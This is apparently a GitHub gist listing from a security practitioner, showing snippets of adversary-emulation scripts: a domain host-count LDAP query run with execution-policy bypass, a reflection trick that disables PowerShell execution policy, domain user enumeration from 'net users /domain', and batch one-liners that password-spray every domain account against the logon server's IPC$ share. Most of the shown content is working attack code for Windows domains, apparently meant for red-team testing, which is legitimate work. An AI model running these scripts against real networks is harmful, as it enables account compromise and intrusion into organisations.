Carrie Roberts clr2of8
clr2of8
/ ZLoader LDAP Query
Created
January 22, 2021 08:01
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| powershell -ep bypass -command "$s=gwmi Win32_ComputerSystem; if (-not $s.PartOfDomain) { $n=-1 } else { $dr='LDAP://';$s.Domain.Split('.') | % { $dr+='DC='+$_+',' }; $dr=$dr.TrimEnd(','); try { $ad=New-Object DirectoryServices.DirectorySearcher(([adsi]$dr),'(objectCategory=computer)',('name')); $n=($ad.FindAll()).Count } catch { $n=-2} };write-host " Hosts count: " $n; " |
clr2of8
/ bypassPowershellExecutionPolicy.ps1
Created
October 24, 2020 22:03
bypass powershell execution policy
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # from https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/ | |
| function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))} | |
| Disable-ExecutionPolicy |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| echo "Bits Job Executed" > %HOMEPATH%\Desktop\bitsjob.txt |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Add-Content $env:USERPROFILE\desktop\bitsjob.txt "Bits job executed" |
clr2of8
/ cloud.json
Created
August 26, 2020 17:02
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "name": "AzureCloudBrainStorming", | |
| "version": "3.0", | |
| "domain": "mitre-enterprise", | |
| "description": "", | |
| "filters": { | |
| "stages": [ | |
| "act" | |
| ], | |
| "platforms": [ |
clr2of8
/ vm settings
Created
July 9, 2020 15:32
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function setKey($registryPath, $Name, $Value, $Type="DWORD") { | |
| IF(!(Test-Path $registryPath)) | |
| { | |
| New-Item -Path $registryPath -Force | Out-Null | |
| New-ItemProperty -Path $registryPath -Name $Name -Value $value -PropertyType $Type -Force | Out-Null | |
| } |
clr2of8
/ pwd-spray-complete.bat
Last active
June 24, 2024 20:46
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rem Create the users.txt by parsing the "net users /domain" output | |
| del %temp%\1.txt >nul 2>&1 & del %temp%\2.txt >nul 2>&1 & del %temp%\3.txt >nul 2>&1 & del %temp%\users.txt >nul 2>&1 | |
| @FOR /F "skip=6 delims=" %a in ('net users /domain ^| findstr /vc:"The command c"') do @set line=%a & @call echo %^line: =,% >> %temp%\1.txt | |
| @FOR /F "delims=" %a in (%temp%\1.txt) do @set line=%a & @call echo %^line:, =,% >> %temp%\2.txt | |
| @FOR /F "tokens=1-3 delims=," %n in (%temp%\2.txt) do @echo %n >> %temp%\3.txt & @echo %o >> %temp%\3.txt & @echo %p >> %temp%\3.txt | |
| @FOR /F "tokens=*" %a in ('type %temp%\3.txt ^| findstr /vc:"ECHO is on."') do @echo %a >> %temp%\users.txt | |
| rem Reset the command window title so you can see the progress of the password spray in the title | |
| title Command Prompt | |
| rem Set your password for the spray here | |
| set password=Spring2020 |
clr2of8
/ parse-net-users.bat
Last active
October 14, 2023 09:28
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| del %temp%\1.txt >nul 2>&1 & del %temp%\2.txt >nul 2>&1 & del %temp%\3.txt >nul 2>&1 & del %temp%\users.txt >nul 2>&1 | |
| @FOR /F "skip=6 delims=" %a in ('net users /domain ^| findstr /vc:"The command c"') do @set line=%a & @call echo %^line: =,% >> %temp%\1.txt | |
| @FOR /F "delims=" %a in (%temp%\1.txt) do @set line=%a & @call echo %^line:, =,% >> %temp%\2.txt | |
| @FOR /F "tokens=1-3 delims=," %n in (%temp%\2.txt) do @echo %n >> %temp%\3.txt & @echo %o >> %temp%\3.txt & @echo %p >> %temp%\3.txt | |
| @FOR /F "tokens=*" %a in ('type %temp%\3.txt ^| findstr /vc:"ECHO is on."') do @echo %a >> %temp%\users.txt |
clr2of8
/ parse-net-users-bat.bat
Last active
July 11, 2020 10:43
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| SETLOCAL EnableDelayedExpansion | |
| del %temp%\1.txt >nul 2>&1 & del %temp%\2.txt >nul 2>&1 & del %temp%\3.txt >nul 2>&1 & del %temp%\users.txt >nul 2>&1 | |
| @FOR /F "skip=6 delims=" %%a in ('net users /domain ^| findstr /vc:"The command c"') do @set line=%%a & @call echo %%line: =,%% >> %temp%\1.txt | |
| @FOR /F "delims=" %%a in (%temp%\1.txt) do @set line=%%a & @call echo %%line:, =,%% >> %temp%\2.txt | |
| @FOR /F "tokens=1-3 delims=," %%n in (%temp%\2.txt) do @echo %%n >> %temp%\3.txt & @echo %%o >> %temp%\3.txt & @echo %%p >> %temp%\3.txt | |
| @FOR /F "tokens=*" %%a in ('type %temp%\3.txt ^| findstr /vc:"ECHO is on."') do @echo %%a >> %temp%\users.txt |
clr2of8
/ pwd-spray-for-loop-enhanced.bat
Last active
July 11, 2020 10:43
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @FOR /F "delims=" %p in (pass.txt) DO @FOR /F "delims=" %n in (users.txt) DO @net use %logonserver%\IPC$ /user:"%userdomain%\%n" "%p" 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete %logonserver%\IPC$ > NUL |